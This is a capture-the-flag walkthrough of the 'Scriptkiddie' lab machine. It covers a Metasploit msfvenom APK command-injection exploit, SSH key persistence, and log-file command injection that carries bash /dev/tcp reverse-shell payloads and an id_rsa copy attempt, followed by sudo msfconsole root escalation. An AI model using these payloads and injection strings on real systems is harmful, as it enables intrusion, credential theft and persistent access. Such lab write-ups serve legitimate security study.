Scriptkiddie

Keywords: metasploit, command injection

IP: 10.10.10.226

NMAP

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Go to web-browser 10.10.10.226:5000 The web-site is some numorous script/msftools.

After some enumeration we find that the msfvenom box is exploitable with android apk template.

Do some research and find rapid7s recipe.

msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show targets
    ...targets...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > set TARGET < target-id >
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show options
    ...show and set options...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > exploit

This creates a apk file we can upload to the website. First we have to find our ip and set up a listener with sudo nc -lvnp 1337. Then run script and we get a reverse connection.

We are then user kid and can read the user.txt flag. Go in to .ssh at /home/kid/.ssh and append your public ssh key from your own computer, like ex. echo "RSA-SSH1242342423423rfddg32t3gr2" >> /home/kid/.ssh/authorized_keys.

We can then ssh into kid with ssh kid@10.10.10.226. (our private key will be loaded and authorized and grant us access)

pwn We have access to user "pwn"s home location. There is a script that run "hackers" file from /home/kid/hackers with the following command

#!/bin/bash
log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Goal is to get kid to run the script. Then something like 1 2 3; whoami; or 1 2 3; cp /home/pwn/.ssh/id_rsa /tmp/key. (this wont work as his tmp folder is another one than kids)

pwn

1 2 $(bash -c "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1")

1 2 `bash -c "bash -i >& /dev/tcp/10.0.0.1/4242 0>&1"`

Gives us a remote shell as pwn user. The script is runned each second. Don't know why but uses pspy64 to spy on running processes and to see what is going on. It shows that the script is urn immidiatly after writing to hackers.

root
escalate to pwn user. Run linpeas.sh and find that pwn can run msfconsole as sudo.

sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

Then run sudo msfconsole and we sort of got our root shell. Use ls, cat, cd and so on in the metasploit console and traverse as root.

Read the root.txt file and submit!